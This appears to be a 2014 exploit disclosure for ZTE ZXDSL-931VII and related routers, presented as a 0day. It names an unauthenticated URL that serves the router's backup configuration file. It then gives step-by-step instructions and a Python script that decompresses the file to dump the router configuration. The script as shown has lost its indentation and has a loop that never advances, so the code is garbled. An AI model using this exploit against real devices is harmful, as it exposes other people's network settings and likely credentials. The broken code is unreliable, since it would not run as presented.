# Exploit Title: ZTE ZXDSL-931VII Unauthenticated Configuration Dump
# Google Dork: use your imagination
# Date: 09-12-2014
# Exploit Author: L0ukanik0sGR
# Vendor Homepage: www.zte.com.cn
# Software Link: https://www.ote.gr/web/guest/help-and-support/internet/vdsl/-/support/article/870213%3Bjsessionid=01605E58A483CF54BB0E95208F531764.node3_1_OTEGR?! original firmware for that device could not be found but it works to all zte devices with custom ISP firmware :)
# Version: 931vii,w300 and all zte products running that firmware
# Tested on: linux other os compatible
# CVE : None yet it's a 0day
ZTE ZXDSL-931VII Unauthenticated Configuration Dump
Unauthenticated Configuration File Download and
Decompression of the _config.bin file
by L0ukanik0s,GR 2014,l0ukanik0s@hotmail.com
Exploit PoC:
1. Go to http://router-ip/ manager_dev_config_t.gch
Click on 'Backup Configuration' and obtain the _config.bin
Download python script from http://pastebin.com/i6dfsL5D
Then compile and run zte-0day.py (root@l0ukanik0s:~# python zte-0day.py)
Insert the path of the _config.bin file hit 'ENTER'
Enjoy your configuration dump
#!/usr/bin/env python
import zlib
#scripte originated from http://reverseengineering.stackexchange.com/questions/3593/re-compressed-backup-file-router-linux-based-so-is-it-compresed-with-zlib
print "################################################"
print "# THe W0lf is so close #"
print "# ZTE 931Vii Router configuration unpacker #"
print "# Find configuration file @#"
print "# #"
print "#L0ukanik0s 2014 Hack-Hosting#"
print "#l0ukanik0s@hotmail.com#"
print "################################################"
print "Enter your config.bin path: e.g root@l0ukanik0s:~#/Desktop/931router_config.bin"
configfile = raw_input("File Path :").strip()
magic_numbers = ['\x78\xDA']
filename = configfile
infile = open(filename, 'r')
data = infile.read()
pos = 0
found = False
while pos < len(data):
window = data[pos:pos+2]
for marker in magic_numbers:
if window == marker:
found = True
start = pos
print "Start of zlib %s" % pos
rest_of_data = data[start:]
decomp_obj = zlib.decompressobj()
uncompressed_msg = decomp_obj.decompress(rest_of_data)
print "Configuration of ZTE 931 File Content: %s" % uncompressed_msg
if pos == len(data):
pos += 1
if found:
header = data[:start]
footer = decomp_obj.unused_data
if not found:
print "Sorry, no zlib found."